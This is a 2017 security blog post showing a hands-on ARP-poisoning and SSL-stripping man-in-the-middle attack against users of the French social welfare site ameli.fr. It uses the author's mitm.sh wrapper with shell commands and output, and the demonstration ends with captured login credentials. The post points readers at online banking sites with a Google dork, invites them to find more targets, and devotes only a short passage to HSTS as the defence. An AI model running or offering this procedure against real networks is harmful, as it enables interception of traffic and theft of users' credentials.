<!DOCTYPE html>
<html lang="en-us">

  <head>
  <link href="http://gmpg.org/xfn/11" rel="profile">
  <meta http-equiv="content-type" content="text/html; charset=utf-8">

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1">

  <title>
    
      MITM, HSTS, and plain HTTP landing page in practice &middot; Lanyon
    
  </title>

  
  <link rel="canonical" href="http://localhost:4000/mitm/2017/03/27/mitm-keep-plain-connection-example/">
  

  <link rel="stylesheet" href="http://localhost:4000/public/css/poole.css">
  <link rel="stylesheet" href="http://localhost:4000/public/css/syntax.css">
  <link rel="stylesheet" href="http://localhost:4000/public/css/lanyon.css">
  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=PT+Serif:400,400italic,700%7CPT+Sans:400">

  <link rel="apple-touch-icon-precomposed" sizes="144x144" href="http://localhost:4000/public/apple-touch-icon-precomposed.png">
  <link rel="shortcut icon" href="http://localhost:4000/public/favicon.ico">

  <link rel="alternate" type="application/rss+xml" title="RSS" href="http://localhost:4000/atom.xml">

  
</head>


  <body>

    <!-- Target for toggling the sidebar `.sidebar-checkbox` is for regular
     styles, `#sidebar-checkbox` for behavior. -->
<input type="checkbox" class="sidebar-checkbox" id="sidebar-checkbox" checked>

<!-- Toggleable sidebar -->
<div class="sidebar" id="sidebar">
  <div class="sidebar-item">
    <p>A reserved <a href="https://jekyllrb.com" target="_blank">Jekyll</a> theme that places the utmost gravity on content with a hidden drawer. Made by <a href="https://twitter.com/mdo" target="_blank">@mdo</a>.</p>
  </div>

  <nav class="sidebar-nav">
    <a class="sidebar-nav-item" href="http://localhost:4000/">Home</a>

    

    
    
      
        
      
    
      
        
      
    
      
        
          <a class="sidebar-nav-item" href="http://localhost:4000/about/">About</a>
        
      
    
      
    
      
    
      
        
      
    
      
        
      
    
      
        
      
    
      
        
      
    
      
        
      
    

    <a class="sidebar-nav-item" href="/archive/v1.1.0.zip">Download</a>
    <a class="sidebar-nav-item" href="">GitHub project</a>
    <span class="sidebar-nav-item">Currently v1.1.0</span>
  </nav>

  <div class="sidebar-item">
    <p>
      &copy; 2020. All rights reserved.
    </p>
  </div>
</div>


    <!-- Wrap is the content to shift when toggling the sidebar. We wrap the
         content to avoid any CSS collisions with our real content. -->
    <div class="wrap">
      <div class="masthead">
        <div class="container">
          <h3 class="masthead-title">
            <a href="/" title="Home">Lanyon</a>
            <small>A Jekyll theme</small>
          </h3>
        </div>
      </div>

      <div class="container content">
        <div class="post">
  <h1 class="post-title">MITM, HSTS, and plain HTTP landing page in practice</h1>
  <span class="post-date">27 Mar 2017</span>
  <p><br />
Hi everybody,</p>

<p>I already wrote some articles talking about the importance of implementing the HTTP Strict Transport Security (<a href="https://https.cio.gov/hsts/">HSTS</a>) and to secure all the webpages, even the landing page.</p>

<p><strong>Why all the pages should be secure ?</strong></p>

<p>Because all the trafic should be hidden from prying eyes. If an attacker could interfer with only one page, several options are available to him. He can strip all secure headers, redirect trafic, change web page content, force HTTP trafic, and so on.<br />
Every case is different but keep in mind that if the victim is able to generate a plain HTTP request (http://website.com), the attacker can control all the trafic.</p>

<p>However, if a ressource has been cached with HSTS, the browser will automatically do an internal redirect (Code 307).<br />
It is important to notice that the <strong>Strict-Transport-Security</strong> header will be cached if it is legitimate, i mean if the header is first saw by the browser on a HTTP response over TLS/SSL and if the certificate is valid (signed by a browser trusted CA). I checked on Chrome and Firefox this behavior. I saw on websites the <strong>Strict-Transport-Security</strong> set on plain HTTP responses, but the browser won’t redirect if the above conditions are not met.</p>

<p>But what if HSTS has never been cached ? so we will be able to fool a victim an maintain an plain text connection as we will see (we won’t deal with any certificate faking here.</p>

<p>In our example we will do a <strong>MITM</strong> attack between a Kali VM and the <a href="http://ameli.fr">french social welfare website</a>. You can find so many other websites, even some online bank websites to reproduce the attack.<br />
MITM attacks still succeed if you are not protected with some soft/hardware dropping unsolicited ARP responses (<a href="https://tools.ietf.org/html/rfc826">RFC 826</a>).</p>

<p>So stop talking, go for the show:<br />
<img src="http://localhost:4000/public/images/mitm-example/pic1.png" alt="pic1" /></p>

<p>We have here a non-secure HTTP landing page. What happens if we click on <em>“Mon compte ameli”</em> in order to log in ?<br />
<img src="http://localhost:4000/public/images/mitm-example/pic2.png" alt="pic2" /></p>

<p>So we have a secure login page.  What about the response headers ?<br />
<img src="http://localhost:4000/public/images/mitm-example/pic3.png" alt="pic3" /></p>

<p>Another check:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:/tmp<span class="nv">$ </span>nmap <span class="nt">-p</span> 443 <span class="nt">--script</span> http-hsts-verify assure.ameli.fr 
Starting Nmap 7.40 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2017-03-27 20:08 CEST
Nmap scan report <span class="k">for </span>assure.ameli.fr <span class="o">(</span>93.174.145.36<span class="o">)</span>
Host is up <span class="o">(</span>0.016s latency<span class="o">)</span><span class="nb">.</span>
PORT    STATE SERVICE
443/tcp open  https
| http-hsts-verify: 
|_  HSTS is not configured.

Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>0.65 seconds
</code></pre></div></div>

<p>I created a wrapper <a href="https://github.com/phackt/mitm">script</a> to manage all the tools involved in the MITM attack. My advice is to run it on a Kali machine. However it will automatically download the web proxy that we will use (<a href="https://mitmproxy.org/">Mitmproxy</a>).</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:/tmp<span class="nv">$ </span>git clone https://github.com/phackt/mitm.git <span class="o">&amp;&amp;</span> <span class="nb">cd</span> ./mitm
Clonage dans <span class="s1">'mitm'</span>...
remote: Counting objects: 49, <span class="k">done</span><span class="nb">.</span>
remote: Compressing objects: 100% <span class="o">(</span>34/34<span class="o">)</span>, <span class="k">done</span><span class="nb">.</span>
remote: Total 49 <span class="o">(</span>delta 15<span class="o">)</span>, reused 35 <span class="o">(</span>delta 9<span class="o">)</span>, pack-reused 0
Dépaquetage des objets: 100% <span class="o">(</span>49/49<span class="o">)</span>, fait.
root@kali:/tmp/mitm<span class="nv">$ </span><span class="nb">sudo</span> ./mitm.sh
Usage: ./mitm.sh <span class="o">[</span><span class="nt">-g</span><span class="o">]</span> <span class="o">[</span><span class="nt">-n</span><span class="o">]</span> <span class="o">[</span><span class="nt">-s</span><span class="o">]</span> <span class="o">[</span><span class="nt">-x</span><span class="o">]</span> <span class="o">[</span><span class="nt">-j</span><span class="o">]</span> &lt;js payload url&gt; <span class="o">[</span><span class="nt">-d</span><span class="o">]</span> <span class="o">[</span><span class="nt">-i</span><span class="o">]</span> &lt;interface&gt; gateway_ip target_ip
       <span class="o">[</span><span class="nt">-g</span><span class="o">]</span> interactive mode <span class="k">for </span>mitmproxy
       <span class="o">[</span><span class="nt">-n</span><span class="o">]</span> capture HTTP traffic
       <span class="o">[</span><span class="nt">-s</span><span class="o">]</span> capture HTTPS traffic
       <span class="o">[</span><span class="nt">-x</span><span class="o">]</span> stripping https
       <span class="o">[</span><span class="nt">-j</span><span class="o">]</span> inject js payload
       <span class="o">[</span><span class="nt">-d</span><span class="o">]</span> dnsspoof + setoolkit
       <span class="o">[</span><span class="nt">-i</span><span class="o">]</span> interface
</code></pre></div></div>

<p>We are almost ready for our mitm attack. We will specify the interactive mode (mitmproxy GUI), the capture HTTP traffic mode only (not faking certificates) and we will apply our custom <strong>sslstrip.py</strong> script.</p>

<p>If you check the <strong>bin</strong> folder, you will find these tools:</p>
<ul>
  <li><strong>arpoison.sh</strong> to automate ARP poisoning</li>
  <li><strong>chk_poison.py</strong> which will check if an ARP poisoning is successful</li>
</ul>

<p>First let’s check the ips:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:/tmp/mitm# route <span class="nt">-n</span>
Table de routage IP <span class="nb">du </span>noyau
Destination     Passerelle      Genmask         Indic Metric Ref    Use Iface
0.0.0.0         192.168.1.1     0.0.0.0         UG    600    0        0 wlan0
root@kali:/tmp/mitm# nmap <span class="nt">-sn</span> 192.168.1.1/24
...
Nmap scan report <span class="k">for </span>kali.home <span class="o">(</span>192.168.1.19<span class="o">)</span>
Host is up <span class="o">(</span>0.00012s latency<span class="o">)</span><span class="nb">.</span>
...
</code></pre></div></div>

<p>Now run mitm.sh</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:/tmp/mitm# ./mitm.sh <span class="nt">-g</span> <span class="nt">-n</span> <span class="nt">-x</span> <span class="nt">-i</span> wlan0 192.168.1.1 192.168.1.19
INTERACTIVE_MODE On
HTTP_INTERCEPTION On
HTTPS_STRIPPING On

Installing mitmproxy v1, please wait...

<span class="nt">--2017-03-27</span> 20:49:08--  https://github.com/mitmproxy/mitmproxy/releases/download/v1.0/mitmproxy-1.0.0post1-linux.tar.gz
Résolution de github.com <span class="o">(</span>github.com<span class="o">)</span>… 192.30.253.113, 192.30.253.112
Connexion à github.com <span class="o">(</span>github.com<span class="o">)</span>|192.30.253.113|:443… connecté.
requête HTTP transmise, en attente de la réponse… 302 Found
Emplacement : https://github-cloud.s3.amazonaws.com/releases/519832/3dcda87e-cbe7-11e6-90f5-73a30be85192.gz?X-Amz-Algorithm<span class="o">=</span>AWS4-HMAC-SHA256&amp;X-Amz-Credential<span class="o">=</span>AKIAISTNZFOVBIJMK3TQ%2F20170327%2Fus-east-1%2Fs3%2Faws4_request&amp;X-Amz-Date<span class="o">=</span>20170327T194852Z&amp;X-Amz-Expires<span class="o">=</span>300&amp;X-Amz-Signature<span class="o">=</span>584985dd5837498f44b588a4bd9f6378f1e12783e75b6dc2ec1acca2772da86f&amp;X-Amz-SignedHeaders<span class="o">=</span>host&amp;actor_id<span class="o">=</span>0&amp;response-content-disposition<span class="o">=</span>attachment%3B%20filename%3Dmitmproxy-1.0.0post1-linux.tar.gz&amp;response-content-type<span class="o">=</span>application%2Foctet-stream <span class="o">[</span>suivant]
<span class="nt">--2017-03-27</span> 20:49:08--  https://github-cloud.s3.amazonaws.com/releases/519832/3dcda87e-cbe7-11e6-90f5-73a30be85192.gz?X-Amz-Algorithm<span class="o">=</span>AWS4-HMAC-SHA256&amp;X-Amz-Credential<span class="o">=</span>AKIAISTNZFOVBIJMK3TQ%2F20170327%2Fus-east-1%2Fs3%2Faws4_request&amp;X-Amz-Date<span class="o">=</span>20170327T194852Z&amp;X-Amz-Expires<span class="o">=</span>300&amp;X-Amz-Signature<span class="o">=</span>584985dd5837498f44b588a4bd9f6378f1e12783e75b6dc2ec1acca2772da86f&amp;X-Amz-SignedHeaders<span class="o">=</span>host&amp;actor_id<span class="o">=</span>0&amp;response-content-disposition<span class="o">=</span>attachment%3B%20filename%3Dmitmproxy-1.0.0post1-linux.tar.gz&amp;response-content-type<span class="o">=</span>application%2Foctet-stream
Résolution de github-cloud.s3.amazonaws.com <span class="o">(</span>github-cloud.s3.amazonaws.com<span class="o">)</span>… 54.231.114.227
Connexion à github-cloud.s3.amazonaws.com <span class="o">(</span>github-cloud.s3.amazonaws.com<span class="o">)</span>|54.231.114.227|:443… connecté.
requête HTTP transmise, en attente de la réponse… 200 OK
Taille : 70081542 <span class="o">(</span>67M<span class="o">)</span> <span class="o">[</span>application/octet-stream]
Sauvegarde en : « /tmp/mitm/mitmproxy/mitmproxy.tar »

/tmp/mitm/mitmproxy/mitmproxy.tar     100%[<span class="o">=======================================================================&gt;]</span>  66,83M  4,94MB/s    <span class="k">in </span>14s     

2017-03-27 20:49:23 <span class="o">(</span>4,82 MB/s<span class="o">)</span> — « /tmp/mitm/mitmproxy/mitmproxy.tar » sauvegardé <span class="o">[</span>70081542/70081542]

mitmproxy
mitmdump
mitmweb

Installation <span class="k">done</span><span class="nb">.</span>

Flushing iptables...
Setting configuration...
No poisoning between 192.168.1.1 -&gt; 192.168.1.19
Do you want to force poisoning? <span class="o">[</span>Yn]:Y
Trying DHCP REQUEST to poison 192.168.1.1...
no answer
Poisoning successful!!!
</code></pre></div></div>

<p><strong>chk_poison.py</strong> can try to force poisoning (works on Orange Livebox) by sending a spoofed DHCP request. The router will automatically generate ARP request after that and will legitimate our spoofed ARP responses.</p>

<p>So now we are definitely ready to intercept the trafic.<br />
<img src="http://localhost:4000/public/images/mitm-example/pic4.png" alt="pic4" /></p>

<p>Now imagine that the victim is surfing on <a href="http://www.ameli.fr">http://www.ameli.fr</a>.<br />
<img src="http://localhost:4000/public/images/mitm-example/pic5.png" alt="pic5" /></p>

<p>We see the trafic passing through the attacker machine.<br />
From the victim’s point of view, everything seems transparent… but notice a detail:<br />
<img src="http://localhost:4000/public/images/mitm-example/pic6.png" alt="pic6" /></p>

<p><em>https://assure.ameli.fr</em> became <em>http://assure.ameli.fr</em>.<br />
Our script will know that it will have to replay the secure connection on the other side. Now when our victim wants to access the login page:<br />
<img src="http://localhost:4000/public/images/mitm-example/pic7.png" alt="pic7" /></p>

<p>Everything seems ok, except…. Where is the green padlock <img src="http://localhost:4000/public/images/mitm-example/padlock.png" alt="padlock" /> ???<br />
So here we are, <strong>sslstrip.py</strong> has done its job, switching every https links into http, deleting every secure headers (HSTS too, so if not cached, the attack will succeed). The script will remind what domains need SSL/TLS and replay the connections in a secure manner with the destination website.</p>

<p>So we have <strong>Victim &lt;- HTTP -&gt; Attacker (Mitmproxy) &lt;- HTTPS -&gt; Website</strong>.  We can now intercept all the trafic in clear.</p>

<p>Don’t be impatient, the victim will log in a few seconds.<br />
<img src="http://localhost:4000/public/images/mitm-example/pic8.png" alt="pic8" /></p>

<p>In our proxy we can see the post request. Let’s check the details:<br />
<img src="http://localhost:4000/public/images/mitm-example/pic9.png" alt="pic9" /></p>

<p>Credentials have been stolen.<br />
And from our victim, is this transparent ?:<br />
<img src="http://localhost:4000/public/images/mitm-example/pic10.png" alt="pic10" /></p>

<p>A lot of people will not notice that the connection is not secure (except you infosec ninjas) and will keep on surfing.  
So since you are clicking on http://banksite.com, if HSTS has not been cached for the domain banksite.com (best to use the preload list), you can keep plain connection because our proxy will strip the redirection to <strong>https</strong>://banksite.com into <strong>http</strong>://banksite.com and will act as we just seen above.</p>

<p>Is it really much more expensive to have all the pages secure ? <a href="https://tools.ietf.org/html/rfc6797">HSTS</a> is also just one header in the response and can easily be added. Companies should also think to have their domain in the preload list in order to perform a 307 internal redirect from the very first request. Here is the <a href="https://hstspreload.org/">HSTS preload list submission form</a>.<br />
Finally we can not talk here about vulnerability, but more as a lack of responsability.</p>

<p>You also can play with the other options of <strong>mitm.sh</strong>:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Usage: ./mitm.sh <span class="o">[</span><span class="nt">-g</span><span class="o">]</span> <span class="o">[</span><span class="nt">-n</span><span class="o">]</span> <span class="o">[</span><span class="nt">-s</span><span class="o">]</span> <span class="o">[</span><span class="nt">-x</span><span class="o">]</span> <span class="o">[</span><span class="nt">-j</span><span class="o">]</span> &lt;js payload url&gt; <span class="o">[</span><span class="nt">-d</span><span class="o">]</span> <span class="o">[</span><span class="nt">-i</span><span class="o">]</span> &lt;interface&gt; gateway_ip target_ip
       <span class="o">[</span><span class="nt">-g</span><span class="o">]</span> interactive mode <span class="k">for </span>mitmproxy
       <span class="o">[</span><span class="nt">-n</span><span class="o">]</span> capture HTTP traffic
       <span class="o">[</span><span class="nt">-s</span><span class="o">]</span> capture HTTPS traffic
       <span class="o">[</span><span class="nt">-x</span><span class="o">]</span> stripping https
       <span class="o">[</span><span class="nt">-j</span><span class="o">]</span> inject js payload
       <span class="o">[</span><span class="nt">-d</span><span class="o">]</span> dnsspoof + setoolkit
       <span class="o">[</span><span class="nt">-i</span><span class="o">]</span> interface
</code></pre></div></div>

<p>You should try this kind of Google Dork: <a href="https://www.google.com/#q=-inurl:https+online+banking+(log+OR+logon+OR+login+OR+account)">-inurl:https online banking (log OR logon OR login OR account)</a></p>

<p>I sincerely hope you enjoyed this post as i liked to do it.<br />
Feel free to comment if you have any question, or if you find other cool domains.</p>

<p>Phackt.</p>

<p>References:</p>
<ul>
  <li><a href="https://github.com/phackt/mitm">https://github.com/phackt/mitm</a></li>
  <li><a href="https://nmap.org/nsedoc/scripts/http-hsts-verify.html">https://nmap.org/nsedoc/scripts/http-hsts-verify.html</a></li>
  <li><a href="https://www.owasp.org/index.php/HTTP_Strict_Transport_Security_Cheat_Sheet">https://www.owasp.org/index.php/HTTP_Strict_Transport_Security_Cheat_Sheet</a></li>
</ul>


</div>


<div class="related">
  <h2>Related posts</h2>
  <ul class="related-posts">
    
      <li>
        <h3>
          <a href="/dev/2020/05/27/git-secrets-exposed/">
            What solutions to prevent git leaks ?
            <small>27 May 2020</small>
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/web/2018/08/05/web-exposed-git-repositories/">
            Gathering some information from web exposed git repositories
            <small>05 Aug 2018</small>
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/web/2017/12/24/play-with-permissive-cors/">
            Play with permissive CORS
            <small>24 Dec 2017</small>
          </a>
        </h3>
      </li>
    
  </ul>
</div>


      </div>
    </div>


    <!-- <label for="sidebar-checkbox" class="sidebar-toggle"></label> -->

    <script src='/public/js/script.js'></script>
 
  </body>
</html>
